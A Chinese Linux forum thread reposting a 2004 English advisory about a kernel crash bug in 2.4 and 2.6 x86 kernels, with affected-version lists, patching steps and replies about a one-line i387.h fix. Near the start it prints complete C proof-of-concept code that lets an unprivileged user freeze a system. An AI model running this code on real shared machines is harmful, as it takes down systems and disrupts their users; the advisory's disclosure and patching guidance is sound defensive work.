摩托學園討論區

[moto]

本文章轉貼自 Sayya BBS 站：

代碼: 選擇全部

 作者  mybigfish.bbs@bbs.ntu.edu.tw (甄士隱),               看板  Linux
 標題  [SA] 新漏洞直搗 Linux 核心
 時間  台大計中椰林風情站 (Tue Jun 15 15:44:50 2004)
 路徑  SayYa!ctu-reader!ctu-peer!news.csie.ncyu!news.ncyu!news.ccu!news.nsysu!

只要一般帳號，利用下面這段程式碼就可以讓你的 Linux 核心崩潰...

New Kernel Crash-Exploit discovered
http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html

Published 2004-06-11 by xiando, v2.2.4, last updated 2004-06-15.

A bug lets a simple C program crash the Linux kernel, effectively
locking the whole system. Affects both 2.4.2x and 2.6.x kernels
on the x86 architecture.

The kernel is the most important part of the Linux operating system.
It handles communication with the computers hardware and decides
the priority of running programs (processes). If the kernels stops
doing it's job, everything else will too.

※ The Evil Code

Running this simple C program crashes the Linux kernel.

crash.c.txt
http://linuxreviews.org/news/2004-06-11_kernel_crash/crash.c.txt

===================================================================
 #include <sys/time.h>
  #include <signal.h>
  #include <unistd.h>

  static void Handler(int ignore)
  {
   char fpubuf[108];
   __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
   write(2, "*", 1);
   __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
  }

  int main(int argc, char *argv[])
  {
   struct itimerval spec;
   signal(SIGALRM, Handler);
   spec.it_interval.tv_sec=0;
   spec.it_interval.tv_usec=100;
   spec.it_value.tv_sec=0;
   spec.it_value.tv_usec=100;
   setitimer(ITIMER_REAL, &spec, NULL);
   while(1)
    write(1, ".", 1);

   return 0;
  }
===================================================================

This bug is confirmed to be present when the code is compiled with
GCC version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux
kernel versions 2.4.2x and 2.6.x on x86 and amd64 systems.



※ The Crashing Kernels

Minor numbers are versions verified, this is just the top the
iceberg:

Linux 2.6.x
    2.6.7-rc2
    2.6.6 (vanilla)
    2.6.6-rc1 SMP (varified by blaise)
    2.6.6 SMP (verified by riven)
    2.6.5-gentoo (verified by RatiX)
    2.6.5-mm6 - (verified by Mariux)
    2.6.5 (fedora core 2 vanilla)
    2.6.3-13mdk (Mandrake)
Linux 2.4.2x
    2.4.26 vanilla
    2.4.26, grsecurity 2.0 config
    2.4.26-rc1 vanilla
    2.4.26-gentoo-r1
    2.4.22
    2.4.22-1.2188 Fedora FC1 Kernel
    2.4.20 RH7.3 (gcc 2.96)
    2.4.18-bf2.4 (debian woody vanilla)

Even grsecurity-patched kernels crash. "I would have hoped that
grsec would have blocked or logged something, but nothing appeared
in the logs." Vincent



※ The safe kernels

This code does nothing but exit with the error message Floating
point exception and can not do any damage to systems running

    * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
    * Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
    * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
    * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
    * Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
    * 2.2.19-kernel

It is unclear why these specific Gentoo patch sets of the 2.4.26
kernel are safe. Other versions of the Gentoo kernel are not.
The user-mode Linux kernel 2.6.5-1um is safe. I assume this means
other versions of user mode Linux are safe.


Linux Kernel 2.6.4 SMP with patches has been reported to be safe.
Reporter uses a version patched with Con Kolivas Staircase scheduler
(but it only affects to the task scheduler). Gcc version 3.3.3.
"System did not crash, I left the crash program 10 minutes and after
that i killed the task and I continued using my system". Guille

The glitch is verified present in Linux 2.5.6 SMP and Linux 2.6.6
SMP.

The bug is not present in 2.2.19, it seems this bug only affects 2.4
and later.



※ The threat

Using this exploit to crash Linux systems requires the (ab)user to
have shell access or other means of uploading and running the
program (like cgi-bin and FTP access). The program works on any
normal user account, root access is not required. This exploit has
been reported used to take down several "lame free-shell providers"
servers (running code you know will damage a system intentionally
and hacking in general is illegal in most parts of the world and
strongly discouraged).

This code only works on x86 Linux machines. This code does not
compile (makes no executable) on sparc64 sun4u TI UltraSparc II
(BlackBird). This doesn't affect NetBSD Stable.

SMP systems can be compromised, but a separate instance of the
program is required for each CPU before the system halts. Each
instance of the program code will lock one CPU and this process can
not be killed. If you have two CPUs the second instance of the
program kills the entire machine.

Check your own system yourself if you are wondering if this affects
you. Better safe than sorry. Assume it will crash, sync (even
unmount) your file systems before testing. If your system is a
production server with 1000 on line users then do not test this code
on that box.

If you enabled Magic SysRq (CONFIG_MAGIC_SYSRQ=y, found in make
menuconfig at Kernel hacking -> Magic SysRq key) in your kernel you
can cleanly reboot if evil freezes your system with the following
keyboard combination:

    1. Alt-SysRq-R (keyboard in raw mode)
    2. Alt-SysRq-S (save unsaved data to disk)
    3. Alt-SysRq-E (send termination signal)
    4. Alt-SysRq-I (send kill signal)
    5. Alt-SysRq-U (remount all mounted file systems)
    6. Alt-SysRq-B (reboots the system)



※ How to protect yourself

The last days were frustrating. Compiling a large number of
different kernel versions just to find that gcc crash.c -o evil &&
./evil halts the system is quite dull. I hoped some kernels would be
unaffected because 2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but
sadly almost all kernels versions die when evil is executed.


>>> Patch for 2.4.2x Kernels <<<

There are two patches available, both of them work with 2.4.xx
kernels:

    * 2.4.26_i387.h_patch.txt
      http://linuxreviews.org/news/2004-06-11_kernel_crash/
      2.4.26_i387.h_patch.txt

    * signal.c-2.4.26.patch.txt (signal.c-2.4.21.patch.txt)
      http://linuxreviews.org/news/2004-06-11_kernel_crash/
      signal.c-2.4.26.patch.txt

2.4.26_i387.h_patch.txt is recommended. This patch was committed to
BitKeeper (http://linux.bkbits.net:8080/linux-2.5/diffs/include/
asm-i386/i387.h@1.16?nav=index.html) by the legendary hero Linus Torvalds
(http://en.wikipedia.org/wiki/Linus_Torvalds). Evil can not do any
damange once this patch is applied, but it will keep running at 99%
CPU until it is killed (like any other process). This is a general
fix for root cause of the flaw evil exploits. The signal.c patch is
more specific to evil and makes the program exit instantly. This
approach works, but it is not a very beautiful solution.
Yours truly has tested both patches with Kernel versions 2.4.25 and
2.4.26, the signal.c patch is also tested with 2.4.21.

Follow these steps to get a safe vanilla kernel:

    1. Read the Kernel Rebuild Guide
       (http://linuxreviews.org//howtos/Kernel-Build-HOWTO/) if this
       is your first time compiling your own kernel
    2. Download the latest kernel source, linux-2.4.26.tar.bz2, from
       your local Linux Kernel Mirror (http://kernel.org/mirrors/)
    3. Unpack the kernel source and make a symbolic link:
        - cd /usr/src/
        - tar xfvj linux-2.4.26.tar.bz2
        - ln -s linux-2.4.26 linux
    4. Download the patch for 2.4.26:
    5. Apply the patch 2.4.26_i387.h_patch.txt
        - patch -p1 -d /usr/src/linux-2.4.26 <2.4.26_i387.h_patch.txt
    6. Configure and compile as usual.
        - make dep bzImage modules modules_install
        - mount /boot (some distributions mount /boot on startup)
        - cp arch/i386/boot/bzImage /boot
        - You may want to call your new kernel something else and
          edit Grub or Lilos configuration.
The patches should apply cleanly to other 2.4.xx versions.


>>> Kernel 2.4.26-rc3-gentoo <<<

2.4.26-rc3-gentoo (gentoo-sources-2.4.26_pre5.patch.bz2) is safe.
This is a patch set for turning linux-2.4.25 -> 2.4.26-rc3-gentoo.

I have no idea why this kernel version is safe from this exploit.
It just is. This kernel patch set returns Floating point exception
instead of locking the system when evil is executed.

This kernel can be used on any Linux system. It does not require
any Gentoo-only tools.

General advice: It is a bad idea to use kernels and patches from
unknown sources. You should only use software from trusted
sources. I know this patch set is safe ? you do not, and you
should not take a strangers word when it comes to security.

    1. Read the Kernel Rebuild Guide if this is your first time
       compiling your own kernel
    2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel
       Mirror (http://kernel.org/mirrors/)
    3. Get the patch set for Gentoo 2.4.26-rc3-gentoo
       aka 2.4.26_pre5:
       (mirror1, http://home.broadpark.no/~osather/gentoo-sources-
       2.4.26_pre5.patch.tar.bz2)
       (mirror2, http://home.no.net/~oyvinsat/gentoo-sources-2.4.2
        6_pre5.patch.tar.bz2)
        - wget http://re.a.la/gs (2,2M)
    4. Unpack the 2.4.25 kernel source:
        - cd /usr/src/
        - tar xfvj linux-2.4.25.tar.bz2
    5. Apply the Gentoo patchset:
        - patch -p1 -d /usr/src/linux-2.4.25 <gentoo-sources-2.4.26_pre5.patch
    6. Rename the kernel and make a symlink from /usr/src/linux:
        - mv linux-2.4.25 linux-2.4.26-rc3-gentoo
        - ln -s linux-2.4.26-rc3-gentoo linux
    7. The Makefile now refers to this kernel as -rc5-gentoo, but
       when you compile your kernel it claims to be
       2.4.26-rc3-gentoo. I assume this is because the original
       Gentoo ebuild changed the version in the Makefile or
       another configuration file to make these match. Open the
       Makefile in your favorite editor and and change line 4 to
       say -rc3-gentoo:
        - cd linux-2.4.26-rc3-gentoo
        - nano -w Makefile
        - "EXTRAVERSION = -rc5-gentoo" -> "EXTRAVERSION = -rc3-gentoo"
    8. Configure your kernel
        - Using your old config:
            + cp /usr/src/linux-oldversion/.config .config && make oldconfig
        - The Linux kernel can be configured with make menuconfig
          (CLI) and make xconfig (GUI)
    9. Compile your new kernel and install as usual:
        - make dep bzImage modules modules_install
        - mount /boot (some distributions mount /boot on startup)
        - cp arch/i386/boot/bzImage /boot
        - You may want to call your new kernel something else and
          edit Grub or Lilos configuration.

Congratulations. You are now running the 2.4.26-rc3-gentoo kernel.


>>> 2.6.xx kernels <<<
A patch for i387.h (2.6.7-rc3-bk5_i387.h.patch.txt，
http://linuxreviews.org/news/2004-06-11_kernel_crash/
2.6.7-rc3-bk5_i387.h.patch.txt)
included in kernel 2.6.7-rc3-bk5 has been tested successfully on
2.6.5 and 2.6.7-rc3 by Marc Ballarin

It is tested successfully on Linux-2.6.7-rc2 by yours truly.

The i387.h patch seems to be the best solution. When evil is
executed it does not freeze the system, but unlike the other
alternative patches it does leave evil running at 99.9% CPU. It
can be stopped with ctrl-c, kill and killall.

    1. Read the Kernel Rebuild Guide
       (http://linuxreviews.org//howtos/Kernel-Build-HOWTO/) if
       this is your first time compiling your own kernel
    2. Get a kernel from kernel.org and unpack it to /usr/src
    3. Get 2.6.7-rc3-bk5_i387.h.patch.txt
       (http://linuxreviews.org/news/2004-06-11_kernel_crash/
        2.6.7-rc3-bk5_i387.h.patch.txt)
    4. patch -p1 -d /usr/src/linux-2.6.7-rc2
<2.6.7-rc3-bk5_i387.h.patch.txt
    5. Follow the usual steps.

Other solutions:

    * Andi Kleen has posted a patch for linux-2.6.7rc3 in the
      linux-kernel mail list available at
        - PATCH fix for Re: timer + fpu stuff locks my console
          race.
      (http://marc.theaimsgroup.com/?l=linux-kernel&m=108707205824094&w=2)
    * http://lkml.org/lkml/2004/6/12/88
    * Raw message: andi_kleen_patch.txt
      (http://linuxreviews.org/news/2004-06-11_kernel_crash/
      andi_kleen_patch.txt)
    * Stian Skjelstad's patch also works with 2.6.7
        - http://lkml.org/lkml/2004/6/12/64
    * Sergey Vlasov has a solution at
        - http://lkml.org/lkml/2004/6/12/81


>>> amd64 <<<

At Gentoo bug #15905 Ballarin Marc writes "IMPORTANT: amd64 is
affected as well. The fix is the same as on x86 (it's included in
2.6.7-rc3-bk6). The file that needs the change is
include/asm-x86_64/i387.h".

Dan Hollis mailed this comment: Contrary to the claims on (this
page), x86_64 is immune from this exploit -- as long as the binary
is built as x86_64 and not ia32.

===================================================================
  Linux 2.6.6 #1 x86_64 x86_64 x86_64 GNU/Linux
  $ file crash
  crash: ELF 64-bit LSB executable, AMD x86-64, \
   version 1 (SYSV), for GNU/Linux 2.4.0,
  dynamically linked (uses shared libs), not stripped
  $ ./crash
  ...........................*....................
  [... continues for some minutes ...]
  control-c
  $
===================================================================

System still up and running smoothly, zero problems. Actually even
compiling it as ia32 doesnt _crash_ the x86_64 kernel, it just
jacks up the tty you run the binary in. The rest of the system
runs fine. -Dan


>>> Fedora Core 2 users <<<

Red Hat has now released a patched kernel for Fedora Core 2. (Fedora
Update Notification FEDORA-2004-171 2004-06-14)

sudo yum -y update kernel*

will upgrade your kernel to the safe Version : 2.6.6, Release :
1.435.


>>> Gentoo Linux users <<<

Safe (patched) kernels for Gentoo Linux were released 2004-06-15:

    * gentoo-sources 2.4.26-r2
      http://www.gentoo-portage.com/browse-program.php?program=4306
        - Full sources including the gentoo patchset for the 2.4
          kernel tree
    * gaming-sources 2.4.20-r12
      http://www.gentoo-portage.com/browse-program.php?program=4305
        - Full sources for the Gentoo gaming-optimized kernel
    * gs-sources 2.4.25_pre7-r6
      http://www.gentoo-portage.com/browse-program.php?program=4307
        - This kernel stays up to date with current kernel -pres,
          with recent acpi,evms,win4lin,futexes,aic79xx,
          superfreeswan,preempt, and various hw fixes.
    * xfs-sources 2.4.24-r7
      http://www.gentoo-portage.com/browse-program.php?program=4334
        - Full sources for the XFS Specialized Gentoo Linux kernel
    * vserver-sources 2.4.26.1.3.9-r1
      http://www.gentoo-portage.com/browse-program.php?program=4334
        - Linux kernel with DEVEL version ctx-/vserver-patch



※ Bug reports
The exploit was reported as gcc bug 15905 2004-06-09. This is
reported to the linux-kernel list with the subject timer + fpu stuff
locks my console race. Reported to Gentoo Bugzilla as bug 53804

---------------------------------------------------------------------
The lastest version of this documents is available at
http://linuxreviews.org/ - Page source:

t2t:2004-06-11_kernel_crash.t2t.tar.bz2
(http://linuxreviews.org/news/2004-06-11_kernel_crash/
2004-06-11_kernel_crash.t2t.tar.bz2)

Copyright (c) 2000-2004 ψyvind Sther
(http://oyvinds.everdot.org/). Permission is granted to copy,
distribute and/or modify this document under the terms of the GNU
Free Documentation License, Version 1.2 or any later version
published by the Free Software Foundation; with no Invariant
Sections, no Front-Cover Texts, and no Back-Cover Texts. A copy of
the license is included in the section entitled "GNU Free
Documentation License". (http://www.gnu.org/licenses/fdl.html)




[脫線]

debian有patch嗎？

目前看到的都不是debian的方式耶

還是要重編核心？

[訪客]

算不上什么严重的漏洞吧。local exploit 本来就很多，这个只不过是 crash 而已……

[訪客]

算不上什么严重的漏洞吧。local exploit 本来就很多，这个只不过是 crash 而已……

crash 還不嚴重喔

[訪客]

重編核心應該也很簡單啊！用 editor 把 include/asm-i386/i387.h 裡面的一行
asm volatile("fwait");
加個 fnclex, 變成
asm volatile("fnclex ; fwait");
然後重新 make 就好了.